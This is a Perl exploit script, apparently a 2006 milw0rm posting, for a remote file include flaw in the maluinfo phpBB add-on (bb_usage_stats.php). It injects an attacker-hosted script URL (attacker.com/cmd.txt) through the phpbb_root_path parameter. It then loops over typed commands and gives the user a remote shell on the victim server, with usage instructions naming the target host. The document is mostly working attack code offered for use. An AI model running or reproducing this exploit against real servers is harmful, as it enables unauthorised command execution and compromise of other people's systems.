usage php yourfile,maluinfo <= 206.2.38 (bb_usage_stats.php) Remote File Include Exploit

#!/usr/bin/perl

#####################################################################################################

# #

# maluinfo 206.2.38 ( brazilian PHPBB ) #

# #

# Class: Remote File Include Vulnerability #

# #

# Patch: unavailable #

# #

# Date: 2006/10/12 #

# #

# Remote: Yes #

# #

# Type: high #

# #

# Site: http://codigolivre.org.br/frs/download.php/1534/maluinfo-206.2.38_release_new_install.zip #

# #

#####################################################################################################

use IO::Socket;

use LWP::Simple;

$cmdshell="http://attacker.com/cmd.txt"; # <====== Change This Line With Your Personal Script

print "\n";

print "######################################################################\n";

print "# #\n";

print "# maluinfo version 206.2.38l Remote File Include Vulnerability #\n";

print "# Bug found By : Ashiyane Corporation #\n";

print "# Email: nima salehi nima[at]ashiyane.ir #\n";

print "# Web Site : www.Ashiyane.ir #\n";

print "# #\n";

print "######################################################################\n";

if (@ARGV < 2)

{

print "\n Usage: Ashiyane.pl [host] [path] ";

print "\n EX : Ashiyane.pl www.victim.com /path/ \n\n";

exit;

}

$host=$ARGV[0];

$path=$ARGV[1];

$vul="includes/bb_usage_stats.php?phpbb_root_path="

print "Type Your Commands ( uname -a )\n";

print "For Exiit Type END\n";

print "<Shell> ";$cmd = <STDIN>;

while($cmd !~ "END") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "Could not connect to host.\n\n";

print $socket "GET ".$path.$vul.$cmdshell."?cmd=".$cmd."? HTTP/1.1\r\n";

print $socket "Host: ".$host."\r\n";

print $socket "Accept: */*\r\n";

print $socket "Connection: close\r\n\n";

while ($raspuns = <$socket>)

{

print $raspuns;

}

print "<Shell> ";

$cmd = <STDIN>;

}

# milw0rm.com [2006-10-13]

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值